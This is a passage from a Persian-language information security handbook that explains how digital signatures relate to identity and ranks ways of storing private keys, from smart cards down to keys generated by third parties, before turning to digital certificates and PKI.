‫ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻥ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺮﺑﻮﻁ ﺑـﻪ "ﻫـﻴﻼﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ" ﻭ "‪ "Batman‬ﺭﺍ‬
‫ﻧﻴﺰ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺑﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﺩ ﭼﻨﺪﻳﻦ ﭘﻴﺶ ﺷﺮﻁ ﺑﺎﻳﺪ ﺑﺮﺁﻭﺭﺩﻩ ﮔﺮﺩﺩ‪:‬‬
‫‪ .١‬ﻫﺮ ﺟﻔﺖ ﻛﻠﻴﺪ ﻋﻮﻣﻲ‪ /‬ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺑﻮﺳﻴﻠﺔ ﻳﻜﻨﻔﺮ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬

‫‪130 Realtime‬‬
‫‪131 Challenge Data‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣١٨‬‬

‫ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﺩﺯﺩﻱ‪ ،‬ﻭ‬ ‫‪.٢‬‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﻫﻮﻳﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﺪ ﺑﺘﻮﺍﻧﺪ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻛﻪ ﻧﺎﻡ ﺭﻭﻱ ﻛﻠﻴﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺎﻡ‬ ‫‪.٣‬‬
‫ﺻﺤﻴﺢ ﺻﺎﺣﺐ ﻓﻌﻠﻲ ﺁﻥ ﻛﻠﻴﺪ ﺍﺳﺖ‪.‬‬
‫ﺍﮔﺮ ﻛﻠﻴﺪﻫﺎ ﺑﺪﻭﻥ ﺩﻗﺖ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺘﻨﺎﻇﺮ ﻣﺤﺎﺳـﺒﻪ ﻛﻨـﺪ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﻛﻠﻴﺪﻫﺎ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﺫﺧﻴﺮﻩ ﻧﺸﻮﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ‪.‬‬
‫ﻻ‬
‫ﻫﺮﭼﻨﺪ ﺩﺭ ﻳﻚ ﻧﮕﺎﻩ ﺳﻄﺤﻲ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻨﺪ‪ ،‬ﺍﻣﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺍﺯ ﺍﻳﻦ ﺑﺪﺗﺮ ﺍﻳﻨﻜﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﺮﺩ ﻭ ﺗﺸﺨﻴﺺ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ﺍﻣـﻦﺗـﺮ ﻫـﺴﺖ ﻳـﺎ‬
‫ﻧﻴﺴﺖ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻭ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺭﺍﻫﻬﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺘﺮﺗﻴﺐ ﻛﺎﻫﺶ ﺍﻳﻤﻨﻲ ﺍﺯ ﻗﺮﺍﺭ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫ﻳﻚ ﻛﻤﻚﭘﺮﺩﺍﺯﻧﺪﺓ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺜﻞ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺑﻜـﺎﺭ ﺑﺮﻳـﺪ‪ .‬ﻳـﻚ ﻛـﺎﺭﺕ ﻫﻮﺷـﻤﻨﺪ ﺳـﺎﺯﮔﺎﺭ ﺑـﺎ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‪ ،‬ﺩﺍﺭﺍﻱ ﻳـﻚ‬ ‫‪.١‬‬
‫ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ‪ ،‬ﻳﻚ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺍﻋﺪﺍﺩ ﺗﺼﺎﺩﻓﻲ‪ ،‬ﻭ ﺗﻮﺍﺑﻊ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺍﻭﻟﻴﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳـﺖ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ‬
‫ﻳﻚ ﺣﺎﻓﻈﻪ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻠﻴﺪﻫﺎ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ‬
‫ﻛﺎﺭﺕ ﺧﺎﺭﺝ ﻧﻤﻲﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺨﺸﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻣﻀﺎ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ‪ ،‬ﺁﻥ ﺑﺨﺶ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻛـﺎﺭﺕ‬
‫ﻣﻨﺘﻘﻞ ﺷﻮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺟﻮﺍﺏ ﺍﻣﻀﺎ ﺷﺪﻩ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﻩ ﺍﺯ ﺭﻭﻱ ﻛﺎﺭﺕ ﻣﻨﺘﻘﻞ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻛﻠﻴـﺪ‬
‫ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﮕﺮ ﺁﻧﻜﻪ ﺧﻮﺩﺷﺎﻥ ﻣﺎﻟﻜﻴﺖ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪ .‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﮐﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﮔﻴﺮﻧـﺪﻩﻫـﺎﻱ‬
‫ﺍﺛﺮ ﺍﻧﮕﺸﺖ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗـﺎ ﻛـﺎﺭﺕ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻲ‬
‫ﺍﻣﻀﺎ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻛﻪ ﺩﺍﺭﻧﺪﺓ ﻛﺎﺭﺕ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﻼ ﺷﻜﺴﺖﭘﺬﻳﺮ ﻣـﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﮔـﺮ ﻛـﺎﺭﺕ ﮔـﻢ ﺷـﻮﺩ‪،‬‬ ‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴﺴﺘﻨﺪ ﻭ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﻛﺎﻣ ﹰ‬
‫ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺁﺳﻴﺐ ﺑﺒﻴﻨﺪ‪ ،‬ﻛﻠﻴﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻥ ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﻧﺪ ﻭ ﺩﻳﮕﺮ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ‬
‫ﻛﺎﺭﺗﻬﺎ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﻧﻮﻋﻲ ﺳﻴﺴﺘﻢ ﻛﭙـﻲ ﻛـﺮﺩﻥ ﺍﺯ‬
‫ﺭﻭﻱ ﻛﺎﺭﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ﺗﺎ ﺍﺯ ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻥ ﻛﻠﻴﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻛﻨـﻴﻢ‪ .‬ﻫﺮﭼﻨـﺪ ﺍﮔـﺮ ﺍﻳـﻦ ﻛﻠﻴـﺪﻫﺎ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﻣـﻀﺎﻫﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﻧﻴﺴﺖ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﻠﻴﺪ ﺍﻣﻀﺎ ﻛﻨﻨﺪﻩ ﮔﻢ ﺷﻮﺩ‪ ،‬ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﻛﻠﻴـﺪ ﺍﻣـﻀﺎ ﻛﻨﻨـﺪﻩ ﺟﺪﻳـﺪ‬
‫ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪ ،‬ﻭ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺭﻭﺩ‪ .‬ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻛﻮﭼﻜﻲ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪ :‬ﻧﻘﺎﻳﺺ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺯ‬
‫ﻛﻠﻴﺪ ﺷﻮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﻛﺎﺭﺕ ﺭﺍ ﺗﺤﻠﻴﻞ ﻛﺮﺩ ﻭ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻭﻱ ﺁﻧـﺮﺍ ﺑﺎﺯﻳـﺎﺑﻲ ﻧﻤـﻮﺩ‪ .‬ﺩﺭ ﻫـﺮ ﺻـﻮﺭﺕ‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‪.‬‬

‫ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ‪ Flash‬ﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ‬ ‫‪.٢‬‬
‫ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﻛﺎﺭﺑﺮ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﺭﺍ ﻭﺍﺭﺩ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻣﻲﻛﻨﺪ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ‬
‫ﻣﻲﺧﻮﺍﻧﺪ‪ ،‬ﻛﻠﻴﺪ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﺍﺯ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺖﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴـﻚ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺩﺭ ﺁﻥ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﻣﻨﺘﻘﻞ ﺷـﻮﺩ‪ ،‬ﺟـﺎﻳﻲ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺣﻤﻠﺔ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺗﺮﺍﻭﺍﻫﺎ‪ ،‬ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﻛﻠﻴﺪ ﺭﺍ ﺩﺍﺧﻞ ﺭﺍﻳﺎﻧﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ‪ ١٣٢‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻓﺎﻳـﻞ ﺭﻭﻱ ﺩﻳـﺴﻚ‬ ‫‪.٣‬‬
‫ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺳﺎﺯﻳﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ ‪ PGP‬ﻭ‪ Netscape Navigator‬ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ‬

‫‪132 Pass Phrase‬‬


‫‪٣١٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻫﺮﭼﻨﺪ ﺗﮑﻨﻴﮏ ﻣﻨﺎﺳﺒﻲ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺍﺷﻜﺎﻝ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ﻭ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺷﻤﺎ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﭼﻮﻥ ﻛﻠﻴـﺪ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ‪ ،‬ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﻳﺎ ﺗﺮﺍﻭﺍﻫﺎ ﺑﻪ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ‪.‬‬
‫ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ‪ /‬ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫‪.۴‬‬
‫ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻭ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻣﺸﻜﻞ ﺍﺻﻠﻲ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ‪،‬‬
‫ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﮐﻪ ﻳﻜﻨﻔﺮ ﺩﻳﮕﺮ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳـﻦ ﻣـﻮﺭﺩ‪ ،‬ﺑﻌـﻀﻲ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ )ﻭ ﺑﻌﻀﻲ ﺩﻭﻟﺘﻬـﺎ( ﺍﻓﺮﺍﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺗﻬﻴﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﺗـﺎ ﺳـﺎﺯﻣﺎﻥ ﻳـﻚ‬
‫ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﻫﻤﺔ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑـﺮﺍﻱ ﺍﺷـﺨﺎﺹ ﺭﺍ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻛﻨـﺪ‪ .‬ﺩﺭ‬
‫ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﮔﺰﻳﻨﺔ ﺳﻮﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ‪ -‬ﺳﺎﺧﺘﻦ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﻭ ﺳـﭙﺲ ﺫﺧﻴـﺮﺓ ﺁﻥ‬
‫ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ‪.‬‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ )‪ ١٣٣(PKI‬ﺗﻼﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﻭﺻـﻞ ﻛـﺮﺩﻥ ﻫﻮﻳـﺖﻫـﺎ ﺑـﻪ ﺍﻣـﻀﺎﻫﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪ .‬ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ ‪ -‬ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﺘﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﻳﻚ ﻫﻮﻳﺖ ﺍﺳﺖ‬
‫ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺗﻔﺴﻴﺮ ﺷﻮﺩ‪ PKI .‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻜﻨﻮﻟﻮﮊﻳﻬﺎ ﻭ ﺧﻂﻣـﺸﻲﻫـﺎ ﺑـﺮﺍﻱ‬
‫ﺍﻳﺠﺎﺩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪ .‬ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﭘﻴﻮﻧﺪ ﻫﻤﺰﻣﺎﻥ ﺳﻪ ﻣﺴﺌﻠﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ :‬ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴـﺪ‬
